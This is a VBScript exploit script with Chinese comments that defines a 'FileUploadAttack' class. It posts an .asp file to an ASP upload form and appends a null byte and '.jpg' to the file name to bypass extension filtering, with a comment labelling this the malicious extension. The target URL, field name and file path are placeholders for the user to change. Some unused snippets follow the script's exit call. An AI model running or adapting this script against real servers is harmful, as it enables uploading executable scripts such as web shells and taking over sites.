Option Explicit 

Function file_get_contents(filename) 
Dim fso, f 
Set fso = WSH.CreateObject("Scripting.FilesystemObject") 
Set f = fso.OpenTextFile(filename, 1) 
file_get_contents = f.ReadAll 
f.Close 
Set f = Nothing 
Set fso = Nothing 
End Function 

' 代碼修改自 http://www.motobit.com/tips/detpg_uploadvbsie/ 
Class FileUploadAttack 
Private m_objWinHttp 
Private m_strUrl 
Private m_strFieldName 

Private Sub Class_Initialize() 
Set m_objWinHttp = WSH.CreateObject( _ 
"WinHttp.WinHttpRequest.5.1") 
End Sub 

Private Sub Class_Terminate() 
Set m_objWinHttp = Nothing 
End Sub 

Public Sub setUrl(url) 
m_strUrl = url 
End Sub 

Public Sub setFieldName(name) 
m_strFieldName = name 
End Sub 

'Infrormations In form field header. 
Function mpFields(FieldName, FileName, ContentType) 
Dim MPTemplate 'template For multipart header 
MPTemplate = "Content-Disposition: form-data; name=""{field}"";" + _ 
" filename=""{file}""" + vbCrLf + _ 
"Content-Type: {ct}" + vbCrLf + vbCrLf 
Dim Out 
Out = Replace(MPTemplate, "{field}", FieldName) 
Out = Replace(Out, "{file}", FileName) 
mpFields = Replace(Out, "{ct}", ContentType) 
End Function 
'Converts OLE string To multibyte string 
Function StringToMB(S) 
Dim I, B 
For I = 1 To Len(S) 
B = B & ChrB(Asc(Mid(S, I, 1))) 
Next 
StringToMB = B 
End Function 

'Build multipart/form-data document with file contents And header info 
Function BuildFormData(FileContents, Boundary, _ 
FileName, FieldName) 
Dim FormData, Pre, Po 
Const ContentType = "application/upload" 

'The two parts around file contents In the multipart-form data. 
Pre = "--" + Boundary + vbCrLf + mpFields(FieldName, _ 
FileName, ContentType) 
Po = vbCrLf + "--" + Boundary + "--" + vbCrLf 

'Build form data using recordset binary field 
Const adLongVarBinary = 205 
Dim RS: Set RS = WSH.CreateObject("ADODB.Recordset") 
RS.Fields.Append "b", adLongVarBinary, _ 
Len(Pre) + LenB(FileContents) + Len(Po) 
RS.Open 
RS.AddNew 
Dim LenData 
'Convert Pre string value To a binary data 
LenData = Len(Pre) 
RS("b").AppendChunk (StringToMB(Pre) & ChrB(0)) 
Pre = RS("b").GetChunk(LenData) 
RS("b") = "" 

'Convert Po string value To a binary data 
LenData = Len(Po) 
RS("b").AppendChunk (StringToMB(Po) & ChrB(0)) 
Po = RS("b").GetChunk(LenData) 
RS("b") = "" 

'Join Pre + FileContents + Po binary data 
RS("b").AppendChunk (Pre) 
RS("b").AppendChunk (FileContents) 
RS("b").AppendChunk (Po) 
RS.Update 
FormData = RS("b") 
RS.Close 
BuildFormData = FormData 
End Function 


Public Function sendFile(fileName) 
Const Boundary = "---------------------------0123456789012" 
m_objWinHttp.Open "POST", m_strUrl, False 
m_objWinHttp.setRequestHeader "Content-Type", _ 
"multipart/form-data; boundary=" + Boundary 

Dim FileContents, FormData 
'Get source file As a binary data. 
FileContents = file_get_contents(FileName) 

' 下面構造了惡意文件擴展名Chr(0) & .jpg 
'Build multipart/form-data document 
FormData = BuildFormData(FileContents, Boundary, _ 
FileName & Chr(0) & ".jpg", m_strFieldName) 

m_objWinHttp.send FormData 
sendFile = m_objWinHttp.Status 
End Function 

Public Function getText() 
getText = m_objWinHttp.ResponseText 
End Function 
End Class 

Function VBMain() 
VBMain = 0 

Dim fileUpload 
Set fileUpload = New FileUploadAttack 
' 需要修改下面內容為合適內容 
' 上傳url 
fileUpload.setUrl "http://localhost/upload/uploadfile.asp" 
fileUpload.setFieldName "filepath" ' 上傳表單框的name 
' 需上傳文件路徑 
If fileUpload.sendFile("E:/projects/asp/index.asp")=200 Then 
MsgBox "上傳成功" & fileUpload.getText() 
Else 
MsgBox "失敗" 
End If 
Set fileUpload = Nothing 
End Function 

Call WScript.Quit(VBMain()) 

' 將指定charset的字符串str轉換為二進制 
Function strtobin(str, charset) 
With WSH.CreateObject("ADODB.Stream") 
.Type = 2 
.Mode = 3 
.Open 
.Charset = charset 
.WriteText str 
.Flush 
.Position = 0 
.Type = 1 

strtobin = .Read() 
.Close 
End With 
End Function 

FileContents = strtobin(file_get_contents(FileName), "ASCII") 

'Returns file contents As a binary data 
Function GetFile(FileName) 
Dim Stream: Set Stream = CreateObject("ADODB.Stream") 
Stream.Type = 1 'Binary 
Stream.Open 
Stream.LoadFromFile FileName 
GetFile = Stream.Read 
Stream.Close 
Set Stream = Nothing 
End Function